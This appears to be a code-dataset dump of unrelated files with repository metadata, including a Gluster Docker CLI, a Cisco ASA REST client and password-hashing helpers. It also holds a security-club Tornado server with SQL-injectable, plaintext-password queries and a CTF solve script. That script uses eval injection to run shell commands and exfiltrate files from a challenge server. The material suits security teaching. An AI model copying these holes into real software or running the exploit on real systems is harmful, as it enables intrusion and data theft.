gant [options] build-base [force]
gant [options] build-main <srcdir>[force]
gant [options] launch <number> [force]
gant [options] stop [<name>] [force]
gant [options] info
gant [options] ssh <name> [--] [<ssh-command>...]
gant [options] ip <name>
gant [options] gluster <name> [--] [<gluster-command>...]
Commands:
build-base Builds the base docker image
build-main Builds the main docker image to be used for launching
containers
launch Launches the given number of containers
stop Stops the launched containers
info Gives information about the gant environment
ssh SSHes into the named container and runs the command if given
ip Gives IP address of the named container
gluster Runs given gluster CLI command in named container
Arguments:
force Forcefully do the operation
<srcdir> Directory containing the GlusterFS source
<number> Number of containers to launch
<name> Name of container to stop
<ssh-command> Command to run inside the container
<gluster-command> Gluster CLI command to run inside the container
Options:
-c <conffile>, --conf <conffile> Configuration file to use
--basetag <basetag> Tag to be used for the base docker image
[default: glusterbase:latest]
--maintag <maintag> Tag to be used for the main docker image
[default: gluster:latest]
--basedir <basedir> Base directory containing the Dockerfile
and helper scripts for Gant
[default: {0}]
--prefix <prefix> Prefix to be used for naming the
launched docker containers
[default: gluster]
-v, --verbose Verbose output
""".format(os.getcwd())
@click.group(no_args_is_help=True)
@click.option("-c", "--conf", type=click.File(),
help="Configuration file to use")
@click.option("--basedir", default=os.getcwd(),
type=click.Path(exists=True, file_okay=False, readable=True),
help="Directory containing the Dockerfile and helper scripts "
"for GAnt")
@click.option("--basetag", default="glusterbase:latest", show_default=True,
help="Tag to be used for the base docker image")
@click.option("--maintag", default="gluster:latest", show_default=True,
help="Tag to be used for the main docker image")
@click.option("--prefix", default="gluster", show_default=True,
help="Prefix used for naming launched containers")
@click.option("--verbose", "-v", count=True, metavar="",
help="Increase verbosity of output")
@click.version_option(prog_name='GAnt')
@click.pass_context
def gant(ctx, conf, basedir, basetag, maintag, prefix, verbose):
"""
GAnt : The Gluster helper ant\n
Creates GlusterFS development and testing environments using Docker
"""
ctx.obj.initConf(basetag, maintag, basedir, prefix, verbose)
ctx.obj.gd.setConf(ctx.obj.conf)
@gant.command(name="build-base", help="Build the base docker image")
@click.option("--force", is_flag=True, default=False,
help="Forcefully do the operation")
@click.pass_context
def build_base(ctx, force):
ctx.obj.gd.build_base_image_cmd(force)
@gant.command(name="build-main",
help="Build the main docker image to be used for launching")
@click.option("--force", is_flag=True, default=False,
help="Forcefully do the operation")
@click.argument("srcdir",
type=click.Path(exists=True, file_okay=False, readable=True))
@click.pass_context
def build_main(ctx, srcdir, force):
ctx.obj.gd.build_main_image_cmd(srcdir, force)
@gant.command(help="Launch the given number of containers")
@click.option("--force", is_flag=True, default=False,
help="Forcefully do the operation")
@click.argument("number", type=click.INT)
@click.pass_context
def launch(ctx, number, force):
ctx.obj.gd.launch_cmd(number, force)
@gant.command(help="Stop the launched containers")
@click.option("--force", is_flag=True, default=False,
help="Forcefully do the operation")
@click.argument("name", required=False, type=click.STRING)
@click.pass_context
def stop(ctx, name, force):
ctx.obj.gd.stop_cmd(name, force)
@gant.command(help="Show information about the GAnt environment")
@click.pass_context
def info(ctx):
ctx.obj.gd.info_cmd()
@gant.command(help="Print ip of given container")
@click.argument("container", type=click.STRING)
@click.pass_context
def ip(ctx, container):
ctx.obj.gd.ip_cmd(container)
@gant.command(help="SSHes into named container and runs command if given")
@click.argument("container", type=click.STRING)
@click.argument("command", required=False, type=click.STRING, nargs=-1)
@click.pass_context
def ssh(ctx, container, command):
ctx.obj.gd.ssh_cmd(container, command)
@gant.command(help="Runs given gluster command in named container")
@click.argument("container", type=click.STRING)
@click.argument("command", type=click.STRING, nargs=-1)
@click.pass_context
def gluster(ctx, container, command):
ctx.obj.gd.gluster_cmd(container, command)
def main():
gant(obj=GantCtx())
| 37.631579 | 78 | 0.658217 | 733 | 5,720 | 5.077763 | 0.190996 | 0.017732 | 0.019344 | 0.040838 | 0.423428 | 0.34202 | 0.3036 | 0.290704 | 0.242343 | 0.136486 | 0 | 0.00068 | 0.229196 | 5,720 | 151 | 79 | 37.880795 | 0.843502 | 0.020979 | 0 | 0.161017 | 0 | 0 | 0.535401 | 0.003943 | 0 | 0 | 0 | 0 | 0 | 1 | 0.084746 | false | 0.067797 | 0.033898 | 0 | 0.118644 | 0.008475 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
77fa574079bff2cba7f0267eea287e361d42b7f6 | 6,945 | py | Python | csse290-server/mainserver.py | RHIT-CSSE/SecurityClub | ee7fa1846f83a41e3503b81eaf0b32e63642abd2 | [
"MIT"
] | null | null | null | csse290-server/mainserver.py | RHIT-CSSE/SecurityClub | ee7fa1846f83a41e3503b81eaf0b32e63642abd2 | [
"MIT"
] | 1 | 2017-05-28T03:04:12.000Z | 2017-05-28T03:04:12.000Z | csse290-server/mainserver.py | RHIT-CSSE/SecurityClub | ee7fa1846f83a41e3503b81eaf0b32e63642abd2 | [
"MIT"
] | null | null | null | # Author: Ishank Tandon
# Date: January 29, 2017
import tornado.ioloop
import tornado.web
import tornado.httpserver
import hashlib
import base64
import json
import mysql.connector as sql
dbuser = 'csse'
# Register a new user
class UserHandler(tornado.web.RequestHandler):
def set_default_headers(self):
self.set_header("Access-Control-Allow-Origin", "*")
self.set_header("Access-Control-Allow-Headers", "x-requested-with")
self.set_header('Access-Control-Allow-Methods', 'POST, GET')
self.set_header('Cache-Control', 'max-age=0,must-revalidate')
def post(self, username, password, person_name):
db = sql.connect(user=dbuser, database='wireshark', host='127.0.0.1')
cursor = db.cursor(buffered=True)
checkquery = "SELECT * FROM userinfo WHERE username = '" + username + "'"
insertquery = "INSERT INTO userinfo(username, password, person_name) VALUES('" + username + "', '" + password + "', '" + person_name + "')"
selectquery = "SELECT id FROM userinfo WHERE username = '" + username + "'"
try:
# import pdb; pdb.set_trace()
cursor.execute(checkquery)
res = cursor.fetchone()
if res is None:
cursor.execute(insertquery)
db.commit()
cursor.execute(selectquery)
idd = cursor.fetchone()[0]
print(idd)
resobj = {'id': idd}
db.commit()
self.write({ 'result': True, 'message': 'Successfully created user', 'data' : resobj})
else:
db.commit()
resobj = {'id': -1 }
self.write({ 'result': False, 'message': 'User already exists', 'data' : resobj})
except sql.Error as err:
db.rollback()
self.write({'result': False, 'message': 'Some weird error occurred' })
db.close()
def get(self, username, password):
db = sql.connect(user=dbuser, database='wireshark', host='127.0.0.1')
cursor = db.cursor(buffered=True)
query = "SELECT * FROM userinfo WHERE username='" + username + "' " + "AND password='" + password + "'"
print(query)
try:
cursor.execute(query)
res = cursor.fetchone()
db.commit()
if res is not None:
resobj = {'id': res[3]}
self.write({ 'result': True, 'message': 'Successfully logged in', 'data': resobj })
else:
resobj = {'id': -1 }
self.write({ 'result': False, 'message': "Couldn't log in.", 'data': resobj })
except sql.Error as err:
db.rollback()
self.write({'result': False, 'message': 'Some weird error occurred' })
db.close()
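The handlers above assemble SQL by string concatenation, so any input containing a quote rewrites the query — presumably the point of this security-club exercise. For reference, the parameterized alternative is sketched below using the stdlib `sqlite3` module (an in-memory stand-in for the `wireshark` MySQL schema; `mysql.connector` follows the same DB-API pattern with `%s` placeholders instead of `?`).

```python
import sqlite3

def login_safe(db, username, password):
    # Placeholders make the driver treat input strictly as data, never as SQL,
    # so a payload like "' OR '1'='1" no longer bypasses the check.
    cur = db.execute(
        "SELECT id FROM userinfo WHERE username = ? AND password = ?",
        (username, password),
    )
    row = cur.fetchone()
    return row[0] if row else -1

# In-memory stand-in for the 'wireshark' database used above.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE userinfo (id INTEGER, username TEXT, password TEXT)")
db.execute("INSERT INTO userinfo VALUES (1, 'alice', 's3cret')")
```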
# Post a new message
class MessageHandler(tornado.web.RequestHandler):
def set_default_headers(self):
self.set_header("Access-Control-Allow-Origin", "*")
self.set_header("Access-Control-Allow-Headers", "x-requested-with")
self.set_header('Access-Control-Allow-Methods', 'POST, GET')
self.set_header('Cache-Control', 'max-age=0,must-revalidate')
def post(self, uid, message):
db = sql.connect(user=dbuser, database='wireshark', host='127.0.0.1')
cursor = db.cursor(buffered=True)
selectquery = "SELECT username, password, person_name FROM userinfo WHERE id = '" + uid + "'"
print(selectquery)
try:
cursor.execute(selectquery)
name = cursor.fetchone()
print(name)
if name is not None:
insertquery = "INSERT INTO posts(person_name, id, message) VALUES('" + name[2] + "', '" + uid + "', '" + message + "')"
cursor.execute(insertquery)
db.commit()
resobj = { 'username': name[0], 'password': name[1] }
self.write({ 'result': True, 'message': 'Successfully created post', 'data': resobj })
else:
db.commit()
self.write({ 'result': False, 'message': 'wrong id breh!!' })
except sql.Error as err:
db.rollback()
self.write({'result': False, 'message': 'Some weird error occurred' })
db.close()
def get(self):
# print(username)
# print(uid)
db = sql.connect(user=dbuser, database='wireshark', host='127.0.0.1')
cursor = db.cursor(buffered=True)
query = "SELECT * FROM posts LIMIT 20"
print(query)
try:
cursor.execute(query)
res = cursor.fetchall()
retobj = []
for item in res:
data = { 'person_name': item[0], 'post': item[2] }
retobj.append(data)
# resobj = {'username': res[0], 'id': res[3]}
db.commit()
if res is not None:
self.write({ 'result': True, 'message': 'Got these posts.', 'data': retobj })
else:
self.write({ 'result': False, 'message': "Couldn't fetch posts." })
except sql.Error as err:
db.rollback()
self.write({'result': False, 'message': 'Some weird error occurred' })
db.close()
class ProxyMainHandler(tornado.web.RequestHandler):
def set_default_headers(self):
self.set_header("Access-Control-Allow-Origin", "*")
self.set_header("Access-Control-Allow-Headers", "x-requested-with")
self.set_header('Access-Control-Allow-Methods', 'POST, GET')
def get(self, numb):
print('input was: ' + numb)
num = int(numb)
if num == 47:
decodedmsg = 'It is a period of civil war. Rebel spaceships, striking from a hidden base, have won their first victory against the evil Galactic Empire.\nDuring the battle, Rebel spies managed to steal secret plans to the Empire\'s ultimate weapon, the DEATH STAR, an armored space station with enough power to destroy an entire planet.\nPursued by the Empire\'s sinister agents, Princess Leia races home aboard her starship, custodian of the stolen plans that can save her people and restore freedom to the galaxy....'
msg = base64.b64encode(decodedmsg)
self.write({ "result": True, "key": msg })
else:
msg = base64.b64encode('Not the secret buddy! Haha try again!')
self.write({ "result": False, "key": msg })
class SharkHandler(tornado.web.RequestHandler):
def get(self):
self.render('sharkclient.html')
class ProxyHandler(tornado.web.RequestHandler):
def get(self):
self.render('client.html')
class ClubHandler(tornado.web.RequestHandler):
def get(self):
self.add_header('CSSE290_CLASS', 'Nu! Lbh znqr vg guvf sne. Jryy, gurerf abguvat zber. Gur frperg vf: v nz njrfbzr.')
self.render('webactivity.html')
def make_app():
return tornado.web.Application([
(r"/shark", SharkHandler),
(r"/shark/signup/username/([^/]*)/password/([^/]*)/person_name/([^/]*)", UserHandler),
(r"/shark/login/username/([^/]*)/password/([^/]*)", UserHandler),
(r"/shark/message/id/([^/]*)/message/([^/]*)", MessageHandler),
(r"/shark/message/get20", MessageHandler),
(r"/proxy", ProxyHandler),
(r"/webactivity", ClubHandler),
(r"/proxy/([^/]*)", ProxyMainHandler),
])
if __name__ == "__main__":
app = tornado.httpserver.HTTPServer(make_app())
app.listen(8888)
tornado.ioloop.IOLoop.current().start()
| 34.552239 | 531 | 0.629662 | 852 | 6,945 | 5.089202 | 0.288732 | 0.029059 | 0.048432 | 0.039437 | 0.492389 | 0.429889 | 0.414207 | 0.375461 | 0.336716 | 0.315037 | 0 | 0.012055 | 0.211663 | 6,945 | 200 | 532 | 34.725 | 0.779909 | 0.026206 | 0 | 0.486486 | 0 | 0.02027 | 0.316452 | 0.067081 | 0.006757 | 0 | 0 | 0 | 0 | 1 | 0.081081 | false | 0.054054 | 0.047297 | 0.006757 | 0.175676 | 0.040541 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
77fba3bfdbce870f9968213b129911ed635849bf | 368 | py | Python | 01_Language/01_Functions/python/preg_replace_callback.py | cliff363825/TwentyFour | 09df59bd5d275e66463e343647f46027397d1233 | [
"MIT"
] | 3 | 2020-06-28T07:42:51.000Z | 2021-01-15T10:32:11.000Z | 01_Language/01_Functions/python/preg_replace_callback.py | cliff363825/TwentyFour | 09df59bd5d275e66463e343647f46027397d1233 | [
"MIT"
] | 9 | 2021-03-10T22:45:40.000Z | 2022-02-27T06:53:20.000Z | 01_Language/01_Functions/python/preg_replace_callback.py | cliff363825/TwentyFour | 09df59bd5d275e66463e343647f46027397d1233 | [
"MIT"
] | 1 | 2021-01-15T10:51:24.000Z | 2021-01-15T10:51:24.000Z | # coding: utf-8
import re
def preg_replace_callback(pattern, callback, subject):
return re.sub(pattern, callback, subject)
if __name__ == '__main__':
text = 'April fools day is 04/01/2002\n' + \
'Last christmas was 12/24/2001\n'
print(preg_replace_callback(r'(\d{2}/\d{2}/)(\d{4})', lambda m: m.group(1) + str(int(m.group(2)) + 1), text))
| 24.533333 | 113 | 0.633152 | 60 | 368 | 3.683333 | 0.7 | 0.099548 | 0.171946 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.076667 | 0.184783 | 368 | 14 | 114 | 26.285714 | 0.66 | 0.035326 | 0 | 0 | 0 | 0 | 0.25779 | 0.05949 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.142857 | 0.142857 | 0.428571 | 0.142857 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 |
77fbaffe827fd494fe1d8b83ddeadea0590d53bf | 2,096 | py | Python | XMAS2018/Krampus/solve.py | flawwan/CTF-Writeups | ee1741f91b869ece5e5a8335935213ac45c015a4 | [
"MIT"
] | 27 | 2018-10-08T13:12:54.000Z | 2021-11-05T13:28:03.000Z | XMAS2018/Krampus/solve.py | flawwan/CTF-Writeups | ee1741f91b869ece5e5a8335935213ac45c015a4 | [
"MIT"
] | 3 | 2018-12-22T21:34:53.000Z | 2019-02-09T10:25:41.000Z | XMAS2018/Krampus/solve.py | flawwan/CTF-Writeups | ee1741f91b869ece5e5a8335935213ac45c015a4 | [
"MIT"
] | 7 | 2018-10-09T03:46:12.000Z | 2021-05-23T17:40:19.000Z | #!/usr/bin/env python
from pwn import *
import base64
import sys
def convertstr(convert, debug=False):
if debug:
print convert
output = ""
for i in convert:
output+= "chr(%d)+" % ord(i)
return output[:-1]
if len(sys.argv) == 2 and sys.argv[1] == "local":
r = remote("0.0.0.0",2000)
else:
r = remote("199.247.6.180",14000)
for i in range(5):
r.readuntil("<You>:")
r.sendline("1")
def dump():
payload_search = convertstr("__import__('os').system('find -follow')")
r.sendline("eval(%s)"%payload_search)
r.readuntil("Krampus>: ")
skip = ["./server.jar"]
lines = r.readuntil("You>: ")[:-10].splitlines()
print "Found %d files" % len(lines)
for f in lines:
print "Downloading file %s" % f
if f in skip:
print "Banned file... Skipping"
continue
if os.path.isfile("./minecraft/%s" % f):
print "File already downloaded..."
continue
payloadchunksize = convertstr("__import__('os').system('cat ./%s | base64 -w 0 | wc -c')" % f)
r.sendline("eval(%s)"%payloadchunksize)
r.readuntil("Krampus>: ")
chunk_size = (r.readuntil("You>: ")[:-9])
print "SIZE: %s" % chunk_size
if "Krampus stares back" in chunk_size:
print "Found directory..."
dirpath = "./minecraft/%s" % f
if not os.path.exists(dirpath):
os.mkdir(dirpath)
print "Directory created"
continue
else:
chunk_size = int(chunk_size)
#This is the ugliest code i have ever seen. That's right. I wonder who wrote it
chunk_ = range(1, chunk_size+1)
n = 50000
output = [chunk_[i:i+n] for i in range(0, len(chunk_), n)]
print "Size of file is %d lines" % chunk_size
counter = 1
data = ""
for i in output:
diff = (i[-1]-i[0])+1
print "Processing chunk [%d of %d]" % (counter,chunk_size)
high = counter+diff
payload = convertstr("__import__('os').system('cat %s | base64 -w 0 | cut -c%d-%d && echo stop')" % (f, counter,high))
counter += diff+1
r.sendline("eval(%s)" % payload)
r.readuntil("Krampus>: ")
data += r.readuntil("stop")[:-5]
data = base64.b64decode(data)
with open('minecraft/%s' % f, 'w') as the_file:
the_file.write(data)
dump()
r.close | 27.946667 | 121 | 0.632634 | 322 | 2,096 | 4.034161 | 0.369565 | 0.055427 | 0.018476 | 0.055427 | 0.08776 | 0.055427 | 0.055427 | 0.055427 | 0.055427 | 0 | 0 | 0.033294 | 0.183206 | 2,096 | 75 | 122 | 27.946667 | 0.725467 | 0.037214 | 0 | 0.119403 | 0 | 0.014925 | 0.261645 | 0.042121 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.089552 | null | null | 0.149254 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
77fc085d04b7709e22eb732bec617f5d06b34521 | 1,304 | py | Python | oxasl_ve/veaslc_cli_wrapper.py | ibme-qubic/oxasl_ve | 51f0701573876042a7fc5f1b91c5085600c6e3c3 | [
"Apache-2.0"
] | 1 | 2021-01-20T12:06:31.000Z | 2021-01-20T12:06:31.000Z | oxasl_ve/veaslc_cli_wrapper.py | physimals/oxasl_ve | f56ea316fddf8b59216a5df7a557bf0c3ea6972b | [
"Apache-2.0"
] | null | null | null | oxasl_ve/veaslc_cli_wrapper.py | physimals/oxasl_ve | f56ea316fddf8b59216a5df7a557bf0c3ea6972b | [
"Apache-2.0"
] | null | null | null | from fsl.wrappers import LOAD
from oxasl_ve.wrappers import veaslc
def veaslc_wrapper(wsp, data, roi):
"""
"""
# Run the C code
ret = veaslc(data, roi, out=LOAD,
diff=wsp.iaf == "vediff",
method=wsp.ifnone("veasl_method", "map"),
veslocs=wsp.veslocs,
imlist="T0123456", # FIXME
encdef=wsp.enc_mac,
modmat=wsp.modmat,
nfpc=wsp.nfpc,
inferloc=wsp.infer_loc,
inferv=wsp.ifnone("infer_v", False),
xystd=wsp.ifnone("xy_std", 1),
rotstd=wsp.ifnone("rot_std", 1.2),
vmean=wsp.ifnone("v_mean", 0.3),
vstd=wsp.ifnone("v_std", 0.01),
njumps=wsp.ifnone("num_jumps", 500),
burnin=wsp.ifnone("burnin", 10),
sampleevery=wsp.ifnone("sample_every", 1),
debug=wsp.ifnone("debug", False),
log=wsp.fsllog)
flow = ret["out/flow"]
prob = ret["out/vessel_prob"]
extras = {
"pis" : ret["out/pis"],
"x" : ret["out/x"],
"y" : ret["out/y"],
"trans" : ret.get("out/trans", None),
}
log = ret["out/logfile"]
return flow, prob, extras, log
| 34.315789 | 60 | 0.480828 | 152 | 1,304 | 4.039474 | 0.513158 | 0.14658 | 0.032573 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025485 | 0.368098 | 1,304 | 37 | 61 | 35.243243 | 0.71966 | 0.015337 | 0 | 0 | 0 | 0 | 0.127559 | 0 | 0 | 0 | 0 | 0.027027 | 0 | 1 | 0.03125 | false | 0 | 0.0625 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7ac85f7048458c2addf6b3de189fc26545d191a3 | 1,173 | py | Python | codeTest.py | horknfbr/random | 5f34b0dd2846fdeaf4940a5bc804f39c4022c90b | [
"MIT"
] | null | null | null | codeTest.py | horknfbr/random | 5f34b0dd2846fdeaf4940a5bc804f39c4022c90b | [
"MIT"
] | null | null | null | codeTest.py | horknfbr/random | 5f34b0dd2846fdeaf4940a5bc804f39c4022c90b | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
pathString = ["PDX-SFO", "SEA-JFK", "SFO-SEA", "LAX-PDX"]
def breakPairs(pairList):
toFrom = {}
fromTo = {}
srca = ''
dsta = ''
src = ''
dst = ''
for i in pairList:
airports = i.split('-')
toFrom[airports[0]] = airports[1]
fromTo[airports[1]] = airports[0]
for key in toFrom.keys():
if key not in fromTo.keys():
srca = key
for keye in fromTo.keys():
if keye not in toFrom.keys():
dsta = keye
retString = f"{ srca }-{ toFrom[srca] }, "
src = toFrom[srca]
for e in toFrom.keys():
if toFrom.get(e) and fromTo.get(e):
retString = f"{ retString }{ fromTo[e] }-{ toFrom[fromTo[e]] }, "
# if srca:
# for e in fromTo.keys():
# if dsta and fromTo.get(e):
# retString = f"{retString}{e}-{toFrom[e]}, "
# else:
# retString = f"{e}-{toFrom[e]}, {retString}"
# srca = toFrom.get(e)
# dsta = fromTo.get(e)
print(f"Path: { retString }")
if __name__ == "__main__":
print(f"Unsorted: { pathString }")
breakPairs(pathString)
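The dictionary-pairing idea in breakPairs — find the endpoint that only ever appears as an origin, then follow the forward map — can be sketched more compactly. `order_path` below is an illustrative name, not part of this file:

```python
def order_path(pairs):
    # Map each origin airport to its destination.
    hops = dict(p.split("-") for p in pairs)
    # The overall start is the origin that never appears as a destination.
    start = (set(hops) - set(hops.values())).pop()
    route = [start]
    while route[-1] in hops:
        route.append(hops[route[-1]])
    return "-".join(route)
```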
| 23.938776 | 77 | 0.498721 | 139 | 1,173 | 4.151079 | 0.294964 | 0.034662 | 0.062392 | 0.048527 | 0.10052 | 0.10052 | 0 | 0 | 0 | 0 | 0 | 0.006369 | 0.330776 | 1,173 | 48 | 78 | 24.4375 | 0.728662 | 0.232737 | 0 | 0 | 0 | 0 | 0.176207 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.074074 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7ac8b758a4914d28a0b5c6ed5e7469c1911dac47 | 2,526 | py | Python | ASAConfigUsingREST/asa/ASA.py | g-ser/pythonNetworking | 56081fbcfc8a45eb0645cd4cd19322acd2f42acd | [
"MIT"
] | null | null | null | ASAConfigUsingREST/asa/ASA.py | g-ser/pythonNetworking | 56081fbcfc8a45eb0645cd4cd19322acd2f42acd | [
"MIT"
] | null | null | null | ASAConfigUsingREST/asa/ASA.py | g-ser/pythonNetworking | 56081fbcfc8a45eb0645cd4cd19322acd2f42acd | [
"MIT"
] | null | null | null | import requests
from requests.auth import HTTPBasicAuth
from enum import Enum, auto
import json
# suppress the message which comes from the self-signed certificate of ASA
requests.packages.urllib3.disable_warnings()
def sendrequest(verb, headers, url, auth, data=''):
"""
Helper method used by the methods in ASA class to
send HTTP-based request to ASA
"""
try:
response = requests.request(verb, headers=headers, url=url, verify=False, auth=auth, data=data)
except requests.exceptions.ConnectionError:
print('Unable to reach url {0}'.format(url))
exit(1)
if response.status_code == 401:
print(
"Login request failed. Status Code {}".format(
response.status_code
)
)
print("Response body: ")
print(response.text)
exit(1)
return response
class ASA(object):
"""A simple object for interacting with Cisco ASA through its REST API"""
def __init__(self, address, username, password):
"""
Setup a new ASA object given address and credentials
"""
self.address = address
self.auth = HTTPBasicAuth(username, password)
self.headers = {"content-type": "application/json", "accept": "application/json"}
def getAllPhysicalIfaces(self):
"""
Use the REST API of ASA to Log into and retrieve all physical interfaces
"""
url = "https://{0}/api/interfaces/physical".format(self.address)
return sendrequest('GET', self.headers, url, self.auth).json()
def setDescMgmtIface(self, desc):
"""
Configures a description for the Management Interface of Cisco ASA
"""
payload = {
"kind" : "object#MgmtInterface",
"interfaceDesc" : "{0}".format(desc)
}
url = "https://{0}/api/interfaces/physical/Management0_API_SLASH_0".format(self.address)
sendrequest('PATCH', self.headers, url, self.auth, json.dumps(payload))
def createLocalUsr(self, name, password, privilegeLevel):
"""
Create local user on Cisco ASA
"""
payload = {
"kind" : "object#LocalUserObj",
"name" : "{0}".format(name),
"password" : "{0}".format(password),
"privilegeLevel" : "{0}".format(privilegeLevel)
}
url = "https://{0}/api/objects/localusers".format(self.address)
sendrequest('POST', self.headers, url, self.auth, json.dumps(payload))
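Every request above authenticates with `HTTPBasicAuth`, which simply attaches an `Authorization: Basic <base64(user:pass)>` header. A stdlib sketch of that header value (the credentials here are made up for illustration):

```python
import base64

def basic_auth_header(username, password):
    # Equivalent header value to what requests' HTTPBasicAuth attaches.
    token = base64.b64encode("{0}:{1}".format(username, password).encode()).decode()
    return "Basic " + token
```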
| 31.575 | 103 | 0.61441 | 283 | 2,526 | 5.448763 | 0.434629 | 0.027237 | 0.01751 | 0.023346 | 0.137484 | 0.105058 | 0.049287 | 0.049287 | 0 | 0 | 0 | 0.008621 | 0.265241 | 2,526 | 79 | 104 | 31.974684 | 0.822198 | 0.176564 | 0 | 0.088889 | 0 | 0 | 0.184921 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0.088889 | 0.088889 | 0 | 0.266667 | 0.088889 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
7acab154c2fe79d2a9e8272d3e4b0a39eb8dbfdd | 1,399 | py | Python | user/authentication.py | cavidanhasanli/TaskManager | 6610370046ed3af228746c9590f23a69a77a9b23 | [
"MIT"
] | null | null | null | user/authentication.py | cavidanhasanli/TaskManager | 6610370046ed3af228746c9590f23a69a77a9b23 | [
"MIT"
] | null | null | null | user/authentication.py | cavidanhasanli/TaskManager | 6610370046ed3af228746c9590f23a69a77a9b23 | [
"MIT"
] | null | null | null | import bcrypt
from fastapi_jwt_auth import AuthJWT
from passlib.context import CryptContext
from .schemas import UserInDB, UserPassword
pwd_context = CryptContext(schemes=["bcrypt"], deprecated="auto")
class Authenticate:
def create_salt_and_hashed_password(
self, *, plaintext_password: str
) -> UserPassword:
salt = self.generate_salt()
hashed_password = self.hash_password(password=plaintext_password, salt=salt)
return UserPassword(salt=salt, password=hashed_password)
@staticmethod
def generate_salt() -> str:
return bcrypt.gensalt().decode()
@staticmethod
def hash_password(*, password: str, salt: str) -> str:
return pwd_context.hash(password + salt)
@staticmethod
def verify_password(*, password: str, salt: str, hashed_pw: str) -> bool:
return pwd_context.verify(password + salt, hashed_pw)
@staticmethod
def create_access_token_for_user(*, user: UserInDB, Authorize: AuthJWT) -> str:
if not user or not isinstance(user, UserInDB):
return None
return Authorize.create_access_token(subject=user.user_name)
@staticmethod
def create_refresh_token_for_user(*, user: UserInDB, Authorize: AuthJWT) -> str:
if not user or not isinstance(user, UserInDB):
return None
return Authorize.create_refresh_token(subject=user.user_name)
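The class above layers a per-user salt on top of passlib's bcrypt context. Since passlib and bcrypt are third-party, the same salt-then-hash-then-constant-time-verify pattern is sketched below with only the standard library (PBKDF2 standing in for bcrypt; the function names are illustrative, not part of this project):

```python
import hashlib
import hmac
import os

def hash_password(password: str, salt: bytes) -> str:
    # PBKDF2-HMAC-SHA256 standing in for passlib's bcrypt context.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000).hex()

def verify_password(password: str, salt: bytes, hashed: str) -> bool:
    # Constant-time comparison, mirroring pwd_context.verify above.
    return hmac.compare_digest(hash_password(password, salt), hashed)

salt = os.urandom(16)
stored = hash_password("hunter2", salt)
```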
| 34.121951 | 84 | 0.706219 | 165 | 1,399 | 5.781818 | 0.30303 | 0.078616 | 0.037736 | 0.048218 | 0.33543 | 0.230608 | 0.230608 | 0.230608 | 0.230608 | 0.230608 | 0 | 0 | 0.203717 | 1,399 | 40 | 85 | 34.975 | 0.856373 | 0 | 0 | 0.290323 | 0 | 0 | 0.007148 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.193548 | false | 0.354839 | 0.129032 | 0.096774 | 0.612903 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
7acba5203922316cadaa6ed16f71cc4bbd1b8a30 | 18,175 | py | Python | tools/preprocess-rcnn-leaf.py | bernardcwj/FYP_2017 | a9c9f6c6f83de018f63f83d283a75f50742108f0 | [
"MIT"
] | null | null | null | tools/preprocess-rcnn-leaf.py | bernardcwj/FYP_2017 | a9c9f6c6f83de018f63f83d283a75f50742108f0 | [
"MIT"
] | null | null | null | tools/preprocess-rcnn-leaf.py | bernardcwj/FYP_2017 | a9c9f6c6f83de018f63f83d283a75f50742108f0 | [
"MIT"
] | null | null | null | import argparse
import os
import glob
import shutil
import json
import re
import hashlib
import numpy as np
import sys
import imgaug as ia
from imgaug import augmenters as iaa
from multiprocessing import Pool, Value, Manager
from lxml import etree
